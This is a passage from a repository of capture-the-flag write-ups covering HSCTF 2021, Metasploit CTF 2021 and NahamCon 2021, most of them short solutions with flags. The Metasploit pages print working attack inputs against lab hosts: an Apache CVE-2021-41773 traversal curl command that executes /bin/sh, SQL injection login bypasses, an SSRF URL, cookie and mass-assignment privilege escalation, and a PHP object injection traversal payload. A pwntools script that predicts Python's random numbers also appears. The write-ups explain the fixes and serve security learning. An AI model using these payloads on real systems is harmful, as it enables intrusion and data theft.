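49 | - And in the logs on that page you can see the login credentials! A status page that lists recent requests exposes anything sent in a URL, so it should never be reachable through a server-side fetch like this one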
50 |
51 |
52 | 
53 |
54 |
--------------------------------------------------------------------------------
/hsctf_2021/README.md:
--------------------------------------------------------------------------------
1 | # HSCTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Misc](misc.md)
8 | * [Web](web.md)
9 | * [Algo](algo.md)
10 | * [Pwn](pwn.md)
11 | * [Crypto](crypto.md)
--------------------------------------------------------------------------------
/hsctf_2021/crypto/queenofthehill.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | queen-of-the-hill Writeup
4 | desc: Check out our writeup for queen-of-the-hill for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: crypto
9 | challenge: queen-of-the-hill
10 | tags: "crypto, starry, cipher"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | 
19 |
20 | A bit of research took me to hill cipher.
21 |
22 | 
23 |
24 | ```
25 | flag{climb_your_way_to_the_top}
26 | ```
--------------------------------------------------------------------------------
/hsctf_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | HSCTF 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | ---
--------------------------------------------------------------------------------
/hsctf_2021/misc/Geographic1.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | Geographic 1 Writeup
4 | desc: Check out our writeup for Geographic 1 for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: Geographic 1
10 | tags: "misc, ava, starry, osint"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Ava and Starry-Lord
17 |
18 | **Image 1**
19 |
20 | https://www.google.com/maps/@35.8980331,14.517993,0a,75y,357.04h,87.26t/data=!3m4!1e1!3m2!1sv4-Tz3_nciJr10A1On3UZA!2e0
21 |
22 | Round up
23 |
24 | ```
25 | 35.898,14.518
26 | ```
27 |
28 | **Image 2**
29 |
30 | https://www.google.com/maps/@43.9376526,12.4458733,0a,75y,4.8h,110.46t/data=!3m4!1e1!3m2!1sRBMGZ4AMaKcpoI7txtv7IQ!2e0
31 |
32 | Round up
33 |
34 | ```
35 | 43.938,12.446
36 | ```
37 |
38 |
--------------------------------------------------------------------------------
/hsctf_2021/misc/Geographic2.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | Geographic 2 Writeup
4 | desc: Check out our writeup for Geographic 2 for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: Geographic 2
10 | tags: "misc, starry, osint"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | **Image** **1**
19 |
20 | ```
21 | Id. Antall József rkp.
22 | 47.504,19.044
23 | ```
24 |
25 | https://maps.app.goo.gl/a8u8REGKuZv6LToe6
26 |
27 |
28 | **Image 2**
29 |
30 | ```
31 | Schwimmende Wiese
32 | 53.62,11.41
33 | ```
34 |
35 | https://maps.app.goo.gl/Pf73iVT5pMxuTiiE7
36 |
37 |
38 | **Image 3**
39 |
40 | ```
41 | CERVESA ALPHA
42 | 42.569,1.489
43 | ```
44 |
45 | https://maps.app.goo.gl/Uk4EBhjeHtNKZP996
46 |
47 |
--------------------------------------------------------------------------------
/hsctf_2021/misc/glasswindows.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | glass-windows Writeup
4 | desc: Check out our writeup for glass-windows for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: glass-windows
10 | tags: "misc, taz, stegano"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | 
19 |
20 | As in the previous challenge, I used stegsolve and changed some planes to get the flag
21 |
22 | 
23 |
24 | ```
25 | flag{this_is_why_i_use_premultiplied_alpha}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/hsctf_2021/misc/palletsofgold.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | pallets-of-gold Writeup
4 | desc: Check out our writeup for pallets-of-gold for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: misc
9 | challenge: pallets-of-gold
10 | tags: "misc, taz, stegano"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | 
19 |
20 | After doing some basic analysis I passed it through stegsolve and changed some planes and got the flag.
21 |
22 | 
23 |
24 | ```
25 | flag{plte_chunks_remind_me_of_gifs}
26 | ```
27 |
28 |
--------------------------------------------------------------------------------
/hsctf_2021/web/NRCnorightclick.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | NRC - no right click Writeup
4 | desc: Check out our writeup for NRC - no right click for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: web
9 | challenge: NRC - no right click
10 | tags: "web, starry"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : Starry-Lord
17 |
18 | To bypass the right click problem:
19 |
20 | ```
21 | view-source:https://no-right-click.hsc.tf/useless-file.css
22 | ```
23 |
24 | 
25 |
26 |
--------------------------------------------------------------------------------
/hsctf_2021/web/grading.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Hsctf 2021 | grading Writeup
4 | desc: Check out our writeup for grading for Hsctf 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Hsctf 2021
7 | parent: hsctf_2021
8 | category: web
9 | challenge: grading
10 | tags: "web, taz"
11 | date: 2021-06-20T00:00:00+00:00
12 | last_modified_at: 2021-06-20T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | Simply log in as `admin` using the password `admin`; the administrator account was protected only by this trivially guessable credential pair.
19 | Go to the simple quiz section, where the flag is shown.
20 |
21 | 
22 |
23 | ```
24 | flag{th3_an5w3r_w4s_HSCTF_0bvi0us1y}
25 | ```
26 |
27 |
--------------------------------------------------------------------------------
/m0lecon_2021/README.md:
--------------------------------------------------------------------------------
1 | # M0leCon CTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [Web](web.md)
--------------------------------------------------------------------------------
/m0lecon_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | M0leCon 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: M0Lecon 2021
7 | ---
--------------------------------------------------------------------------------
/metasploit_2021/10_of_clubs.md:
--------------------------------------------------------------------------------
1 | ## 10 of clubs
2 |
3 | > Solved by: Starry-Lord
4 |
5 | ```
6 | port 12380
7 | ```
8 |
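9 | This port was running Apache httpd 2.4.49, the release affected by the path traversal tracked as CVE-2021-41773 (the incomplete first fix led to CVE-2021-42013). The traversal becomes command execution when CGI is enabled and the filesystem root is not covered by `Require all denied`; the remedy is to upgrade to a patched release (2.4.51 or later). I found a good write-up on the subject here: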
10 |
11 | https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
12 |
13 |
14 | I didn't need to get a shell. ls and cat commands were enough to extract the png:
15 |
16 |
17 | ```
18 | curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'
19 | ```
20 |
21 | 
--------------------------------------------------------------------------------
/metasploit_2021/10_of_clubs/10ofclubs.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 10 of clubs Writeup
4 | desc: Check out our writeup for 10 of clubs for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 10_of_clubs
9 | challenge: 10 of clubs
10 | tags: "web, starry, cve, rce"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | ```
19 | port 12380
20 | ```
21 |
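22 | This port was running Apache httpd 2.4.49, the release affected by the path traversal tracked as CVE-2021-41773 (the incomplete first fix led to CVE-2021-42013). The traversal becomes command execution when CGI is enabled and the filesystem root is not covered by `Require all denied`; the remedy is to upgrade to a patched release (2.4.51 or later). I found a good write-up on the subject here: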
23 |
24 | https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013
25 |
26 |
27 | I didn't need to get a shell. ls and cat commands were enough to extract the png:
28 |
29 |
30 | ```
31 | curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'
32 | ```
33 |
34 | 
--------------------------------------------------------------------------------
/metasploit_2021/2_of_spades.md:
--------------------------------------------------------------------------------
1 | ## 2 of spades
2 |
3 | > Solved by: Taz34
4 |
5 | Did a NIKTO scan on the target
6 |
7 | ```
8 | nikto -h http://172.17.15.117:443/
9 | ```
10 |
11 | and one of the lines in the result showed this :
12 |
13 | ```
14 | + /.env: .env file found. The .env file may contain credentials.
15 | ```
16 |
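17 | so I opened the exposed `/.env` file (a file, not a sub-directory), which apparently held the flag image's file name. Dotfiles like this should never be served from the web root, since they often hold credentials.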
18 |
19 | 
20 |
21 | inserted the file name in the URL
22 |
23 | ```
24 | http://172.17.15.117:443/3e6f0e21-7faa-429f-8a1d-3f715a520da4.png
25 | ```
26 |
27 | 
28 |
29 | and we have the flag.
--------------------------------------------------------------------------------
/metasploit_2021/2_of_spades/2ofspades.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 2 of spades Writeup
4 | desc: Check out our writeup for 2 of spades for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 2_of_spades
9 | challenge: 2 of spades
10 | tags: "web, taz, nikto"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Taz34
17 |
18 | Did a NIKTO scan on the target
19 |
20 | ```
21 | nikto -h http://172.17.15.117:443/
22 | ```
23 |
24 | and one of the lines in the result showed this :
25 |
26 | ```
27 | + /.env: .env file found. The .env file may contain credentials.
28 | ```
29 |
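30 | so I opened the exposed `/.env` file (a file, not a sub-directory), which apparently held the flag image's file name. Dotfiles like this should never be served from the web root, since they often hold credentials.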
31 |
32 | 
33 |
34 | inserted the file name in the URL
35 |
36 | ```
37 | http://172.17.15.117:443/3e6f0e21-7faa-429f-8a1d-3f715a520da4.png
38 | ```
39 |
40 | 
41 |
42 | and we have the flag.
--------------------------------------------------------------------------------
/metasploit_2021/4_of_diamonds.md:
--------------------------------------------------------------------------------
1 | ## 4 of diamonds
2 |
3 | > Solved by: Starry-Lord
4 |
5 | ```
6 | Port 10010
7 | ```
8 |
9 | Here we had a web app with a register and login page.
10 |
11 | Registering gave access to the website and showed that the user details were stored in a javascript variable in the response.
12 |
13 | ```javascript
14 |
20 | ```
21 |
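22 | By intercepting the register request, I noticed the form was sent as parameters like `account[username]=starlord`, and decided to add `account[role]=admin` to see if it would give me admin privileges. This is a mass-assignment flaw: the server evidently accepted a field the form never offered, so a registration handler should bind only an explicit allow-list of attributes and set the role itself.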
23 |
24 | By doing so I got a session with an additional admin button, which gave me the flag.
25 |
26 | 
--------------------------------------------------------------------------------
/metasploit_2021/4_of_diamonds/4ofdiamonds.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 4 of diamonds Writeup
4 | desc: Check out our writeup for 4 of diamonds for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 4_of_diamonds
9 | challenge: 4 of diamonds
10 | tags: "web, starry"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | ```
19 | Port 10010
20 | ```
21 |
22 | Here we had a web app with a register and login page.
23 |
24 | Registering gave access to the website and showed that the user details were stored in a javascript variable in the response.
25 |
26 | ```javascript
27 |
33 | ```
34 |
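35 | By intercepting the register request, I noticed the form was sent as parameters like `account[username]=starlord`, and decided to add `account[role]=admin` to see if it would give me admin privileges. This is a mass-assignment flaw: the server evidently accepted a field the form never offered, so a registration handler should bind only an explicit allow-list of attributes and set the role itself.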
36 |
37 | By doing so I got a session with an additional admin button, which gave me the flag.
38 |
39 | 
--------------------------------------------------------------------------------
/metasploit_2021/4_of_hearts.md:
--------------------------------------------------------------------------------
1 | ## 4 of hearts
2 |
3 | > Solved by: everyone
4 |
5 | ```
6 | Port 80
7 | ```
8 |
9 | Free flag for those who managed to set up their SOCKS proxy properly and reach the challenges.
10 |
11 | 
--------------------------------------------------------------------------------
/metasploit_2021/4_of_hearts/4ofhearts.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 4 of hearts Writeup
4 | desc: Check out our writeup for 4 of hearts for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 4_of_hearts
9 | challenge: 4 of hearts
10 | tags: "web"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: everyone
17 |
18 | ```
19 | Port 80
20 | ```
21 |
22 | Free flag for those who managed to set up their SOCKS proxy properly and reach the challenges.
23 |
24 | 
--------------------------------------------------------------------------------
/metasploit_2021/5_of_diamonds.md:
--------------------------------------------------------------------------------
1 | ## 5 of diamonds
2 |
3 | > Solved by: Starry-Lord, Thewhiteh4t, Bobbysox
4 |
5 | ```
6 | Port 11111
7 | ```
8 |
9 | This was an SQL injection vulnerability. We had many stability problems with this one; in fact only one of us could attack it with sqlmap at the time.
10 |
11 | We managed to get the password out of the database. It was a very long alphanumeric string, longer than the maximum number of characters the input field on the login page accepts. That limit is enforced only in the browser, so it is not a security control.
12 |
13 | Sending the password with Burp got around the limit, and the response displayed a link to flag.png
14 |
15 | ### Afterthought
16 |
17 | We could bypass login through the username field with
18 |
19 | ```
20 | username=X'or 1=1 --
21 | password=notThePassword
22 | ```
23 |
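24 | but I missed that we could also simply bypass authentication through the password field, which suggests both values were concatenated into the SQL statement; bound parameters (prepared statements) would close both routes: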
25 |
26 | ```
27 | username=admin
28 | password='or 1=1 --
29 | ```
30 |
31 | 
--------------------------------------------------------------------------------
/metasploit_2021/5_of_diamonds/5ofdiamonds.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 5 of diamonds Writeup
4 | desc: Check out our writeup for 5 of diamonds for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 5_of_diamonds
9 | challenge: 5 of diamonds
10 | tags: "web, starry, twh, bobby, sql, sqli"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord, Thewhiteh4t, Bobbysox
17 |
18 | ```
19 | Port 11111
20 | ```
21 |
22 | This was an SQL injection vulnerability. We had many stability problems with this one; in fact only one of us could attack it with sqlmap at the time.
23 |
24 | We managed to get the password out of the database. It was a very long alphanumeric string, longer than the maximum number of characters the input field on the login page accepts. That limit is enforced only in the browser, so it is not a security control.
25 |
26 | Sending the password with Burp got around the limit, and the response displayed a link to flag.png
27 |
28 | ### Afterthought
29 |
30 | We could bypass login through the username field with
31 |
32 | ```
33 | username=X'or 1=1 --
34 | password=notThePassword
35 | ```
36 |
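37 | but I missed that we could also simply bypass authentication through the password field, which suggests both values were concatenated into the SQL statement; bound parameters (prepared statements) would close both routes: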
38 |
39 | ```
40 | username=admin
41 | password='or 1=1 --
42 | ```
43 |
44 | 
--------------------------------------------------------------------------------
/metasploit_2021/9_of_diamonds.md:
--------------------------------------------------------------------------------
1 | ## 9 of diamonds
2 |
3 | > Solved By : thewhiteh4t
4 |
5 | ```
6 | Port : 8080
7 | ```
8 |
9 | In this challenge we were presented with a website about cookies, obvious hint.
10 | There were 3 sections :
11 |
12 | - User Registration
13 | - User Login
14 | - Admin Login
15 |
16 | First I registered a user account and checked the cookies, there were 4 cookies for our user :
17 |
18 | - admin : false
19 | - authenticated-user : true
20 | - made-an-account : true
21 | - visited-main-page : true
22 |
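23 | I just had to change `admin` from false to true and resend the request, and we got the flag. The server trusted a client-editable cookie for authorisation; the role belongs in server-side session state, or at least in a cookie that is signed and verified.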
24 |
25 | 
--------------------------------------------------------------------------------
/metasploit_2021/9_of_diamonds/9ofdiamonds.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | 9 of diamonds Writeup
4 | desc: Check out our writeup for 9 of diamonds for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: 9_of_diamonds
9 | challenge: 9 of diamonds
10 | tags: "web, twh"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved By : thewhiteh4t
17 |
18 | ```
19 | Port : 8080
20 | ```
21 |
22 | In this challenge we were presented with a website about cookies, obvious hint.
23 | There were 3 sections :
24 |
25 | - User Registration
26 | - User Login
27 | - Admin Login
28 |
29 | First I registered a user account and checked the cookies, there were 4 cookies for our user :
30 |
31 | - admin : false
32 | - authenticated-user : true
33 | - made-an-account : true
34 | - visited-main-page : true
35 |
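36 | I just had to change `admin` from false to true and resend the request, and we got the flag. The server trusted a client-editable cookie for authorisation; the role belongs in server-side session state, or at least in a cookie that is signed and verified.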
37 |
38 | 
--------------------------------------------------------------------------------
/metasploit_2021/README.md:
--------------------------------------------------------------------------------
1 | ## MetaSploit CTF 2021
2 |
3 | ## WriteUps
4 |
5 | We have added all the challenges we were able to solve, this is not a complete list.
6 |
7 | * [2 of Spades](2_of_spades.md)
8 | * [3 of Hearts](3_of_hearts.md)
9 | * [4 of Diamonds](4_of_diamonds.md)
10 | * [4 of Hearts](4_of_hearts.md)
11 | * [5 of Diamonds](5_of_diamonds.md)
12 | * [9 of Diamonds](9_of_diamonds.md)
13 | * [10 of Clubs](10_of_clubs.md)
14 | * [Ace of Hearts](ace_of_hearts.md)
15 | * [Jack of Hearts](jack_of_hearts.md)
--------------------------------------------------------------------------------
/metasploit_2021/ace_of_hearts.md:
--------------------------------------------------------------------------------
1 | ## ace of hearts
2 |
3 | > Solved by: Starry-Lord
4 |
5 | ```
6 | Port 20011
7 | ```
8 |
9 | We had an image gallery here with 4 user galleries.
10 |
11 | Sarah’s gallery
12 | John’s gallery
13 | Ripley’s gallery
14 | Ash’s gallery
15 |
16 | John’s gallery was not accessible, set to private.
17 |
18 | When querying any other gallery, we could see the URL changing like so:
19 |
20 | ```
21 | http://172.17.15.117:20011/gallery?galleryUrl=/admin
22 | ```
23 |
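24 | I tried requesting the admin gallery through localhost and got access to the admin panel, where I just had to untick a box to make John’s gallery public. This is server-side request forgery (SSRF): the server fetches whatever `galleryUrl` names, so the request for `/admin` arrives from a local address. `galleryUrl` should be restricted to an allow-list of gallery paths, and the admin panel should require authentication instead of (evidently) trusting the source address.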
25 |
26 | ```
27 | http://172.17.15.117:20011/gallery?galleryUrl=http://127.0.0.1:20011/admin
28 | ```
29 |
30 | He had this flag inside:
31 |
32 | 
33 |
34 | > Yay an Ace!!!
35 | > — Starry-Lord
--------------------------------------------------------------------------------
/metasploit_2021/ace_of_hearts/aceofhearts.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Metasploit 2021 | ace of hearts Writeup
4 | desc: Check out our writeup for ace of hearts for Metasploit 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | parent: metasploit_2021
8 | category: ace_of_hearts
9 | challenge: ace of hearts
10 | tags: "web, starry"
11 | date: 2021-12-08T00:00:00+00:00
12 | last_modified_at: 2021-12-08T00:00:00+00:00
13 | ---
14 |
15 |
16 | > Solved by: Starry-Lord
17 |
18 | ```
19 | Port 20011
20 | ```
21 |
22 | We had an image gallery here with 4 user galleries.
23 |
24 | Sarah’s gallery
25 | John’s gallery
26 | Ripley’s gallery
27 | Ash’s gallery
28 |
29 | John’s gallery was not accessible, set to private.
30 |
31 | When querying any other gallery, we could see the URL changing like so:
32 |
33 | ```
34 | http://172.17.15.117:20011/gallery?galleryUrl=/admin
35 | ```
36 |
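37 | I tried requesting the admin gallery through localhost and got access to the admin panel, where I just had to untick a box to make John’s gallery public. This is server-side request forgery (SSRF): the server fetches whatever `galleryUrl` names, so the request for `/admin` arrives from a local address. `galleryUrl` should be restricted to an allow-list of gallery paths, and the admin panel should require authentication instead of (evidently) trusting the source address.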
38 |
39 | ```
40 | http://172.17.15.117:20011/gallery?galleryUrl=http://127.0.0.1:20011/admin
41 | ```
42 |
43 | He had this flag inside:
44 |
45 | 
46 |
47 | > Yay an Ace!!!
48 | > — Starry-Lord
--------------------------------------------------------------------------------
/metasploit_2021/index.html:
--------------------------------------------------------------------------------
1 | ---
2 | layout: ctf_page
3 | title: The White Circle | CTF Writeups | MetaSploit 2021
4 | desc: "The White Circle is a community for Cyber/Information Security students, enthusiasts and professionals. You can discuss anything related to Security, share your knowledge with others, get help when you need it and proceed further in your journey with amazing people from all over the world."
5 | image: images/twc_og_banner.jpg
6 | ctf: Metasploit 2021
7 | ---
--------------------------------------------------------------------------------
/metasploit_2021/jack_of_hearts.md:
--------------------------------------------------------------------------------
1 | ## jack of hearts
2 |
3 | > Solved By : thewhiteh4t
4 |
5 | ```
6 | Port : 20022
7 | ```
8 |
9 | - User cookie is double base64 encoded, so we double decoded and ended up with the following :
10 |
11 | ```
12 | O:4:"user":3:{
13 | s:8:"username";s:4:"user";
14 | s:5:"admin";b:0;
15 | s:11:"profile_img";s:23:"/var/www/html/guest.png";
16 | }
17 | ```
18 |
19 | ```
20 | O -> Object
21 | O:4 -> Object whose class name is 4 characters long
22 | :3: -> Object has 3 attributes
23 | s -> String data type
24 | s:8 -> String of length 8
25 | b -> Boolean data type
26 | b:0 -> False
27 | ```
28 |
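29 | - This was a **PHP Object Injection** challenge: the server unserializes a cookie that the client controls. The defence is to never `unserialize()` client-supplied data (use a signed token or plain JSON) and to resolve file paths against a fixed directory
30 | - The goal of this challenge was not to become admin; if we try, the server sends hints or funny responses
31 | - Directly accessing the flag did not work, so we used `../` path traversal in `profile_img` (the `s:` length prefix changes from 23 to 40 to match the new string)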
32 | - Final payload :
33 |
34 | ```
35 | O:4:"user":3:{
36 | s:8:"username";s:4:"user";
37 | s:5:"admin";b:0;
38 | s:11:"profile_img";s:40:"/var/www/html/../../../../../../flag.png";
39 | }
40 | ```
41 |
42 | 
--------------------------------------------------------------------------------
/nahamcon_2021/README.md:
--------------------------------------------------------------------------------
1 | # NahamCon CTF 2021
2 |
3 |
4 |
5 |
6 |
7 | ## WriteUps
8 |
9 | We have added all the challenges we were able to solve, this is not a complete list.
10 |
11 | * [Android](android.md)
12 | * [Cryptography](crypto.md)
13 | * [Forensics](forensics.md)
14 | * [Misc](misc.md)
15 | * [Mission](mission.md)
16 | * [OSINT](osint.md)
17 | * [Steganography](stego.md)
18 | * [Web](web.md)
--------------------------------------------------------------------------------
/nahamcon_2021/android.md:
--------------------------------------------------------------------------------
1 | # Android
2 |
3 | ## Andra
4 |
5 | unzip the file you will find the flag at :
6 |
7 | ```
8 | andra/res/layout/activity_flag.xml
9 | ```
10 |
11 | ----------
12 |
13 | ## Resourceful
14 |
15 | * enable usb debugging
16 | * connect usb
17 | * use adb shell
18 |
19 | 
20 |
21 | * flag will appear on phone
22 |
23 | 
24 |
--------------------------------------------------------------------------------
/nahamcon_2021/android/Andra.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Andra Writeup
4 | desc: Check out our writeup for Andra for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: android
9 | challenge: Andra
10 | tags: "android"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | unzip the file you will find the flag at :
18 |
19 | ```
20 | andra/res/layout/activity_flag.xml
21 | ```
22 |
23 |
--------------------------------------------------------------------------------
/nahamcon_2021/android/Resourceful.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Resourceful Writeup
4 | desc: Check out our writeup for Resourceful for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: android
9 | challenge: Resourceful
10 | tags: "android, adb"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
17 | * enable usb debugging
18 | * connect usb
19 | * use adb shell
20 |
21 | 
22 |
23 | * flag will appear on phone
24 |
25 | 
26 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/CarKeys.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Car Keys Writeup
4 | desc: Check out our writeup for Car Keys for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: Car Keys
10 | tags: "crypto, cipher"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 | keyed caesar cipher
17 |
18 | https://www.boxentriq.com/code-breaking/keyed-caesar-cipher
19 |
20 | use the key: `QWERTY`
21 |
22 |
--------------------------------------------------------------------------------
/nahamcon_2021/crypto/DiceRoll.md:
--------------------------------------------------------------------------------
1 | ---
2 | layout: load_md
3 | title: The White Circle | Nahamcon 2021 | Dice Roll Writeup
4 | desc: Check out our writeup for Dice Roll for Nahamcon 2021 capture the flag competition.
5 | image: images/twc_og_banner.jpg
6 | ctf: Nahamcon 2021
7 | parent: nahamcon_2021
8 | category: crypto
9 | challenge: Dice Roll
10 | tags: "crypto, rng, python"
11 | date: 2021-03-15T00:00:00+00:00
12 | last_modified_at: 2021-03-15T00:00:00+00:00
13 | ---
14 |
15 |
16 |
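17 | The given script shows that the challenge uses a random number generator. Python's `random` module is a Mersenne Twister (MT19937), which is not cryptographically secure: once 624 consecutive 32-bit outputs have been observed, its internal state can be reconstructed and every later output predicted. Googling, we found a GitHub repo with a Python module that lets us predict the number. (Values that must be unpredictable should come from `secrets` or `os.urandom` instead.)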
18 |
19 | https://github.com/kmyk/mersenne-twister-predictor
20 |
21 |
22 | We use the following code to automate the process with pwntools
23 |
24 | ```
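25 | from pwn import *
26 | from mt19937predictor import MT19937Predictor
27 | import re  # imported by the original script but not used below
28 | predictor = MT19937Predictor()  # rebuilds the MT19937 state from observed outputs
29 |
30 | r = remote('challenge.nahamcon.com' , '31784')
31 | r.recvuntil('> ')  # wait for the first menu prompt
32 | for i in range (0, 625):  # gather consecutive outputs; the MT19937 state is 624 32-bit words
33 |
34 |     r.sendline('2')  # loop body (indentation restored; the listing had lost it)
35 |     text = r.recvuntil('> ')
36 |     print(text)
37 |     num = [int(s) for s in text.split() if s.isdigit()]  # keep only the all-digit tokens of the reply
38 |     print(num)
39 |     num = num[0]  # the first number in the reply is taken as the generator output
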